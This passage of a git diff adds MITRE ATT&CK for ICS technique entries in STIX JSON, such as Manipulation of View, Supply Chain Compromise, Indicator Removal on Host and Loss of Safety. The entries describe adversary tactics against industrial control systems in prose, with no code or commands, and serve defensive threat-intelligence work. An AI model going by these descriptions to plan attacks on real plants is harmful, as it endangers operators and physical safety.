an intrusion to maintain a small footprint or as a standard part of the post-intrusion cleanup process. (Citation: Enterprise ATT&CK January 2018)\n\nData destruction may also be used to render operator interfaces unable to respond and to disrupt response functions from occurring as expected. An adversary may also destroy data backups that are vital to recovery after an incident.\n\nStandard file deletion commands are available on most operating system and device interfaces to perform cleanup, but adversaries may use other tools as well. Two examples are Windows Sysinternals SDelete and Active@ Killdisk.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "Control Server", + "Human-Machine Interface", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Matan Dobrushin - Otorio" + ], + "x_mitre_data_sources": [ + "File: File Deletion", + "File: File Modification", + "Command: Command Execution", + "Process: Process Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0809", + "external_id": "T0809" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 File Deletion Retrieved. 2018/05/17 ", + "url": "https://attack.mitre.org/wiki/Technique/T1107" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--4c2e1408-9d68-4187-8e6b-a77bc52700ec.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--4c2e1408-9d68-4187-8e6b-a77bc52700ec.json new file mode 100644 index 0000000000000000000000000000000000000000..9fd0802ccc9df06de4c1f2aa23d9fb31dce1cedd --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--4c2e1408-9d68-4187-8e6b-a77bc52700ec.json @@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--b1845aff-a0bf-4b99-895f-ef0d33972822", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Manipulation of View", + "description": "Adversaries may attempt to manipulate the information reported back to operators or controllers. This manipulation may be short term or sustained. During this time the process itself could be in a much different state than what is reported. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) \n\nOperators may be fooled into doing something that is harmful to the system in a loss of view situation. With a manipulated view into the systems, operators may issue inappropriate control sequences that introduce faults or catastrophic failures into the system. Business analysis systems can also be provided with inaccurate data leading to bad management decisions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Engineering Workstation", + "Human-Machine Interface", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--4c2e1408-9d68-4187-8e6b-a77bc52700ec", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0832", + "external_id": "T0832" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--50d3222f-7550-4a3c-94e1-78cb6c81d064.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--50d3222f-7550-4a3c-94e1-78cb6c81d064.json new file mode 100644 index 0000000000000000000000000000000000000000..8441e3c0ed8af98e5007a528a66af67c0401300c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--50d3222f-7550-4a3c-94e1-78cb6c81d064.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--09baf50c-8d59-4c7e-8229-1d4c6bb0b379", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Data Historian Compromise", + "description": "Adversaries may compromise and gain control of a data historian to gain a foothold into the control system environment. Access to a data historian may be used to learn stored database archival and analysis information on the control system. A dual-homed data historian may provide adversaries an interface from the IT environment to the OT environment. \n\nDragos has released an updated analysis on CrashOverride that outlines the attack from the ICS network breach to payload delivery and execution. (Citation: Industroyer - Dragos - 201810) The report summarized that CrashOverride represents a new application of malware, but relied on standard intrusion techniques. In particular, new artifacts include references to a Microsoft Windows Server 2003 host, with a SQL Server. Within the ICS environment, such a database server can act as a data historian. Dragos noted a device with this role should be \"expected to have extensive connections\" within the ICS environment. Adversary activity leveraged database capabilities to perform reconnaissance, including directory queries and network connectivity checks.\n\nPermissions Required: Administrator\n\nContributors: Joe Slowik - Dragos", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Joe Slowik - Dragos" + ], + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "id": "attack-pattern--50d3222f-7550-4a3c-94e1-78cb6c81d064", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0810", + "external_id": "T0810" + }, + { + "source_name": "Industroyer - Dragos - 201810", + "description": "Dragos. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved October 14, 2019.", + "url": "https://dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--539d0484-fe95-485a-b654-86991c0d0d00.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--539d0484-fe95-485a-b654-86991c0d0d00.json new file mode 100644 index 0000000000000000000000000000000000000000..d9a2dbea90f5624b193a967f86b315c0a4bdc297 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--539d0484-fe95-485a-b654-86991c0d0d00.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--104c8763-a3a0-47f3-a59a-8366a2355f2d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Network Service Scanning", + "description": "Network Service Scanning is the process of discovering services on networked systems. This can be achieved through a technique called port scanning or probing. Port scanning interacts with the TCP/IP ports on a target system to determine whether ports are open, closed, or filtered by a firewall. This does not reveal the service that is running behind the port, but since many common services are run on [https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml specific port numbers], the type of service can be assumed. More in-depth testing includes interaction with the actual service to determine the service type and specific version. One of the most-popular tools to use for Network Service Scanning is [https://nmap.org/ Nmap].\n\nAn adversary may attempt to gain information about a target device and its role on the network via Network Service Scanning techniques, such as port scanning. Network Service Scanning is useful for determining potential vulnerabilities in services on target devices. Network Service Scanning is closely tied to .\n\nScanning ports can be noisy on a network. In some attacks, adversaries probe for specific ports using custom tools. This was specifically seen in the Triton and PLC-Blaster attacks.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--539d0484-fe95-485a-b654-86991c0d0d00", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0841", + "external_id": "T0841" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805.json new file mode 100644 index 0000000000000000000000000000000000000000..22862bb3af4d214e2c33cc90e3f6f12fdbc291a6 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--d1797562-ffd4-47d2-9eb3-ffa812c27be3", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Indicator Removal on Host", + "description": "Adversaries may attempt to remove indicators of their presence on a system in an effort to cover their tracks. In cases where an adversary may feel detection is imminent, they may try to overwrite, delete, or cover up changes they have made to the device.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Process: OS API Execution", + "File: File Metadata", + "Windows Registry: Windows Registry Key Deletion", + "File: File Modification", + "Command: Command Execution", + "Windows Registry: Windows Registry Key Modification", + "Process: Process Creation", + "File: File Deletion" + ], + "type": "attack-pattern", + "id": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0872", + "external_id": "T0872" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204.json new file mode 100644 index 0000000000000000000000000000000000000000..2d19ea2d8074c968003e8ccbdd800a809f785241 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--431176ba-d425-47d7-9f05-51d546b2ba62", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "I/O Image", + "description": "Adversaries may seek to capture process values related to the inputs and outputs of a PLC. During the scan cycle, a PLC reads the status of all inputs and stores them in an image table. (Citation: Nanjundaiah, Vaidyanath) The image table is the PLCs internal storage location where values of inputs/outputs for one scan are stored while it executes the user program. After the PLC has solved the entire logic program, it updates the output image table. The contents of this output image table are written to the corresponding output points in I/O Modules.\n\nThe Input and Output Image tables described above make up the I/O Image on a PLC. This image is used by the user program instead of directly interacting with physical I/O. (Citation: Spenneberg, Ralf 2016) \n\nAdversaries may collect the I/O Image state of a PLC by utilizing a devices [Native API](https://attack.mitre.org/techniques/T0834) to access the memory regions directly. The collection of the PLCs I/O state could be used to replace values or inform future stages of an attack.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Asset: Software" + ], + "type": "attack-pattern", + "id": "attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0877", + "external_id": "T0877" + }, + { + "source_name": "Nanjundaiah, Vaidyanath", + "description": "Nanjundaiah, Vaidyanath PLC Ladder Logic Basics Retrieved. 2021/10/11 ", + "url": "https://www.ezautomation.net/industry-articles/plc-ladder-logic-basics.htm" + }, + { + "source_name": "Spenneberg, Ralf 2016", + "description": "Spenneberg, Ralf 2016 PLC-Blaster Retrieved. 2019/06/06 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--56ddc820-6cfb-407f-850b-52c035d123ac.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--56ddc820-6cfb-407f-850b-52c035d123ac.json new file mode 100644 index 0000000000000000000000000000000000000000..b1550c5d18d6f7d1e3a0387465d076a3972bad7e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--56ddc820-6cfb-407f-850b-52c035d123ac.json @@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--4113ee5d-0eb1-4d5b-a51b-a72b1fc15b28", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:16:25.031Z", + "name": "Denial of View", + "description": "Adversaries may cause a denial of view in attempt to disrupt and prevent operator oversight on the status of an ICS environment. This may manifest itself as a temporary communication failure between a device and its control source, where the interface recovers and becomes available once the interference ceases. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) \n\nAn adversary may attempt to deny operator visibility by preventing them from receiving status and reporting messages. Denying this view may temporarily block and prevent operators from noticing a change in state or anomalous behavior. The environment's data and processes may still be operational, but functioning in an unintended or adversarial manner. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "type": "attack-pattern", + "id": "attack-pattern--56ddc820-6cfb-407f-850b-52c035d123ac", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0815", + "external_id": "T0815" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4.json new file mode 100644 index 0000000000000000000000000000000000000000..5c2b08822445760f0ca11cd18e422712295ccfdc --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--8f4749a1-5360-4d0a-8ab7-d85f7797039b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Execution through API", + "description": "Adversaries may attempt to leverage Application Program Interfaces (APIs) used for communication between control software and the hardware. Specific functionality is often coded into APIs which can be called by software to engage specific functions on a device or other software.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Process: OS API Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0871", + "external_id": "T0871" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3.json new file mode 100644 index 0000000000000000000000000000000000000000..0d031fff8def89a8a3073ec536ac782b77af79fa --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3.json @@ -0,0 +1,63 @@ +{ + "type": "bundle", + "id": "bundle--c569336f-0805-4abe-90cf-4520a8c58ed8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Supply Chain Compromise", + "description": "Adversaries may perform supply chain compromise to gain control systems environment access by means of infected products, software, and workflows. Supply chain compromise is the manipulation of products, such as devices or software, or their delivery mechanisms before receipt by the end consumer. Adversary compromise of these products and mechanisms is done for the goal of data or system compromise, once infected products are introduced to the target environment. \n\nSupply chain compromise can occur at all stages of the supply chain, from manipulation of development tools and environments to manipulation of developed products and tools distribution mechanisms. This may involve the compromise and replacement of legitimate software and patches, such as on third party or vendor websites. Targeting of supply chain compromise can be done in attempts to infiltrate the environments of a specific audience. In control systems environments with assets in both the IT and OT networks, it is possible a supply chain compromise affecting the IT environment could enable further access to the OT environment. \n\nCounterfeit devices may be introduced to the global supply chain posing safety and cyber risks to asset owners and operators. These devices may not meet the safety, engineering and manufacturing requirements of regulatory bodies but may feature tagging indicating conformance with industry standards. Due to the lack of adherence to standards and overall lesser quality, the counterfeit products may pose a serious safety and operational risk. (Citation: Control Global May 2019) \n\nYokogawa identified instances in which their customers received counterfeit differential pressure transmitters using the Yokogawa logo. The counterfeit transmitters were nearly indistinguishable with a semblance of functionality and interface that mimics the genuine product. (Citation: Control Global May 2019) \n\nF-Secure Labs analyzed the approach the adversary used to compromise victim systems with Havex. (Citation: Daavid Hentunen, Antti Tikkanen June 2014) The adversary planted trojanized software installers available on legitimate ICS/SCADA vendor websites. After being downloaded, this software infected the host computer with a Remote Access Trojan (RAT).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Control Server", + "Data Historian", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface", + "Input/Output Server", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "File: File Metadata" + ], + "type": "attack-pattern", + "id": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0862", + "external_id": "T0862" + }, + { + "source_name": "Control Global May 2019", + "description": "Control Global 2019, May 29 Yokogawa announcement warns of counterfeit transmitters Retrieved. 2021/04/09 ", + "url": "https://www.controlglobal.com/industrynews/2019/yokogawa-announcement-warns-of-counterfeit-transmitters/" + }, + { + "source_name": "Daavid Hentunen, Antti Tikkanen June 2014", + "description": "Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01 ", + "url": "https://www.f-secure.com/weblog/archives/00002718.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--5f3da2f3-91c8-4d8b-a02f-bf43a11def55.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--5f3da2f3-91c8-4d8b-a02f-bf43a11def55.json new file mode 100644 index 0000000000000000000000000000000000000000..3d877d18cf0699adcb6d83fb55cc2f62a603228c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--5f3da2f3-91c8-4d8b-a02f-bf43a11def55.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--a07277a9-3fa8-4c60-bca4-34c93b05494e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Serial Connection Enumeration", + "description": "Adversaries may perform serial connection enumeration to gather situational awareness after gaining access to devices in the OT network. Control systems devices often communicate to each other via various types of serial communication mediums. These serial communications are used to facilitate informational communication, as well as commands. Serial Connection Enumeration differs from I/O Module Discovery, as I/O modules are auxiliary systems to the main system, and devices that are connected via serial connection are normally discrete systems.\n\nWhile IT and OT networks may work in tandem, the exact structure of the OT network may not be discernible from the IT network alone. After gaining access to a device on the OT network, an adversary may be able to enumerate the serial connections. From this perspective, the adversary can see the specific physical devices to which the compromised device is connected to. This gives the adversary greater situational awareness and can influence the actions that the adversary can take in an attack.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Input/Output Server", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--5f3da2f3-91c8-4d8b-a02f-bf43a11def55", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0854", + "external_id": "T0854" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--5fa00fdd-4a55-4191-94a0-564181d7fec2.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--5fa00fdd-4a55-4191-94a0-564181d7fec2.json new file mode 100644 index 0000000000000000000000000000000000000000..a441fd65ceb60ade8ecc75d822c0dfbb7e58c17f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--5fa00fdd-4a55-4191-94a0-564181d7fec2.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--fd2d8ca2-b5a3-4ecf-9aaa-7368d0ff80c3", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Loss of Safety", + "description": "Adversaries may compromise safety system functions designed to maintain safe operation of a process when unacceptable or dangerous conditions occur. Safety systems are often composed of the same elements as control systems but have the sole purpose of ensuring the process fails in a predetermined safe manner. \n\nMany unsafe conditions in process control happen too quickly for a human operator to react to. Speed is critical in correcting these conditions to limit serious impacts such as Loss of Control and Property Damage. \n\nAdversaries may target and disable safety system functions as a prerequisite to subsequent attack execution or to allow for future unsafe conditionals to go unchecked. Detection of a Loss of Safety by operators can result in the shutdown of a process due to strict policies regarding safety systems. This can cause a Loss of Productivity and Revenue and may meet the technical goals of adversaries seeking to cause process disruptions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--5fa00fdd-4a55-4191-94a0-564181d7fec2", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0880", + "external_id": "T0880" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee.json 